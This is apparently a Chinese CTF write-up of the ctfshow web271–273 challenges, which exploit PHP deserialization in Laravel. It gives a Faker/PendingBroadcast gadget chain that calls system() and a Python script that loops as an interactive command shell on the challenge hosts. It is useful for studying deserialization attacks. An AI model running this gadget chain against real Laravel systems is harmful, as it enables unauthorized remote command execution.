首页 > 编程语言 >PHP反序列化题型_Laravel框架漏洞利用

PHP反序列化题型_Laravel框架漏洞利用

时间:2023-11-13 13:31:43浏览次数:45  
标签:Laravel __ PHP function command arg encode 序列化 payload

ctfshow web271

<?php


define('LARAVEL_START', microtime(true));


require __DIR__ . '/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__ . '/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
@unserialize($_POST['data']);
highlight_file(__FILE__);

$kernel->terminate($request, $response);
?>


payload:

import requests, base64, time

###ctfshow web271

def round(command: str, arg: str):
    url = "http://5d4ff0ee-f4a0-42cb-a90b-ac85f76f256b.challenge.ctf.show/"  # 末尾的/不能少了
    payload = b'O:40:"Illuminate\\Broadcasting\\PendingBroadcast":2:{s:9:"\x00*\x00events";O:15:"Faker\\Generator":1:{s:13:"\x00*\x00formatters";a:1:{s:8:"dispatch";s:function_l:"function";}}s:8:"\x00*\x00event";s:arg_l:"arg";}'
    payload = payload.replace(b"function_l", str(len(command)).encode())
    payload = payload.replace(b"function", command.encode())

    payload = payload.replace(b"arg_l", str(len(arg)).encode())
    payload = payload.replace(b"arg", arg.encode())
    params = {"r": "test/ss", "data": payload}
    while True:
        try:
            resp = requests.post(url, data=params)
            break
        except:
            time.sleep(0.1)

    while True:
        try:
            resp = requests.get(url + "1")
            break
        except:
            time.sleep(0.1)

    return resp.text


if __name__ == '__main__':
    print("请输入命令...")
    while True:
        command = "system"
        arg = input(">>> ")
        if arg == "exit":
            break
        if arg == "":
            continue
        res = round(command, arg + " | tee 1")
        print(res[:-1])


执行以上python代码,

先输入命令 ls -al /  查找flag位置

再 cat /flag


web272

<?php
namespace Faker{
    class Generator{
        protected $formatters;
        public function __construct()
        {
            $this -> formatters = ['dispatch' => 'system'];
        }
    }
}
namespace Illuminate\Broadcasting{
    use Faker\Generator;
    class PendingBroadcast{
        protected $events;
        protected $event;
        public function __construct()
        {
            $this -> events = new Generator();
            $this -> event = 'whoami';
        }
    }
    $a = new PendingBroadcast();
    $res = serialize($a);
    echo base64_encode($res);
}
?>

payload:

import requests, base64, time

##ctfshow web272
def round(command: str, arg: str):
    url = "http://ab5ef085-913a-4179-82f0-567e07eda99f.challenge.ctf.show/"
    payload = b'O:40:"Illuminate\\Broadcasting\\PendingBroadcast":2:{s:9:"\x00*\x00events";O:15:"Faker\\Generator":1:{s:13:"\x00*\x00formatters";a:1:{s:8:"dispatch";s:function_l:"function";}}s:8:"\x00*\x00event";s:arg_l:"arg";}'
    payload = payload.replace(b"function_l", str(len(command)).encode())
    payload = payload.replace(b"function", command.encode())

    payload = payload.replace(b"arg_l", str(len(arg)).encode())
    payload = payload.replace(b"arg", arg.encode())
    params = {"r": "test/ss", "data": payload}
    while True:
        try:
            resp = requests.post(url, data=params)
            break
        except:
            time.sleep(0.1)

    while True:
        try:
            resp = requests.get(url + "1")
            break
        except:
            time.sleep(0.1)

    return resp.text


if __name__ == '__main__':
    print("请输入命令...")
    while True:
        command = "system"
        arg = input(">>> ")
        if arg == "exit":
            break
        if arg == "":
            continue
        res = round(command, arg + " | tee 1")
        print(res[:-1])


web273

<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <[email protected]>
 */

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__ . '/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__ . '/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
@unserialize($_POST['data']);
highlight_file(__FILE__);

$kernel->terminate($request, $response);

payload同上。

标签:Laravel,__,PHP,function,command,arg,encode,序列化,payload
From: https://blog.51cto.com/u_16350624/8342547

相关文章

  • Kubernetes API 多版本和序列化
    前言三年前在分析KuberneteAPIServer时,就经常遇到两个东西,一个是Scheme,一个是Codec,当时对它们并不是很理解,也没有去细究,但是后来越来越多的能够遇见它们,尤其是在做KubernetesAPI相关的开发时,Scheme的出镜率很高,于是查了下资料才知道,原来他们跟Kubernetes的API多版本和序列化有......
  • 在PHP中,HTTP_HOST和SERVER_NAME有什么区别?
    内容来自DOChttps://q.houxu6.top/?s=在PHP中,HTTP_HOST和SERVER_NAME有什么区别?以下是$_SERVER['HTTP_HOST']和$_SERVER['SERVER_NAME']在PHP中的区别?何时会考虑使用其中之一以及原因是什么?在PHP中,$_SERVER['HTTP_HOST']是从HTTP请求头获取的值,它是客户端实际用作请求的目......
  • win10系统phpstorm改用PowerShell终端
    习惯了linux的命令行操作,windowns的cmd都不支持,现在好了win10的PowerShell支持了linux命令操作。文件--》设置--》工具--》Terminal将Shellpath路径改为 C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe保存后重启phpstorm,熟悉的linux命令就可以使用了......
  • PHP反序列化题型_YII框架漏洞利用
    ctfshowweb267通过页面加载yii.js判断使用yii框架。用弱口令admin/admin可登录在about页面发现提示view-source访问提示页面?r=site%2Fabout&view-source页面提示///backdoor/shellunserialize(base64_decode($_GET['code']))因此构造payload必须先base64_encode再serializepayloa......
  • 使用 AJAX、PHP 和服务器发送事件从 OpenAI 的 API 流式传输数据
    如何使用服务器发送事件(SSE)将数据从上述API流式传输到使用JavaScript和PHP的浏览器客户端?我已经研究这个问题好几个小时了,但我似乎无法弄清楚出了什么问题。作为参考,我尝试在这里调整解决方案:StreamDATAFromopenaiGPT-3APIusingPHP我的代码的其余部分或多或少与上......
  • ThinkPHP5漏洞分析之SQL注入1
    漏洞概要本次漏洞存在于Builder类的parseData方法中。由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:5.0.13<=ThinkPHP<=5.0.15、5.1.0<=ThinkPHP<=5.1.5。漏洞环境通过以下命令获取测试环境代码:composercreate-proje......
  • ThinkPHP5漏洞分析之SQL注入2
    漏洞概要本次漏洞存在于Mysql类的parseArrayData方法中由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:5.1.6<=ThinkPHP<=5.1.7(非最新的5.1.8版本也可利用)。漏洞环境通过以下命令获取测试环境代码:composercreate-pro......
  • ThinkPHP5漏洞分析之SQL注入3
    漏洞概要本次漏洞存在于Mysql类的parseWhereItem方法中。由于程序没有对数据进行很好的过滤,将数据拼接进SQL语句,导致SQL注入漏洞的产生。漏洞影响版本:ThinkPHP5全版本。漏洞环境通过以下命令获取测试环境代码:composercreate-project--prefer-disttopthink/think=......
  • ThinkPHP5漏洞分析之SQL注入4
    漏洞概要本次漏洞存在于Mysql类的parseWhereItem方法中。由于程序没有对数据进行很好的过滤,直接将数据拼接进SQL语句。再一个,Request类的filterValue方法漏过滤NOTLIKE关键字,最终导致SQL注入漏洞的产生。漏洞影响版本:ThinkPHP=5.0.10。漏洞环境通过以下命令获......
  • ThinkPHP5漏洞分析之SQL注入5
    漏洞概要本次漏洞存在于Builder类的parseOrder方法中。由于程序没有对数据进行很好的过滤,直接将数据拼接进SQL语句,最终导致SQL注入漏洞的产生。漏洞影响版本:5.1.16<=ThinkPHP5<=5.1.22。漏洞环境通过以下命令获取测试环境代码:composercreate-project--prefer-dist......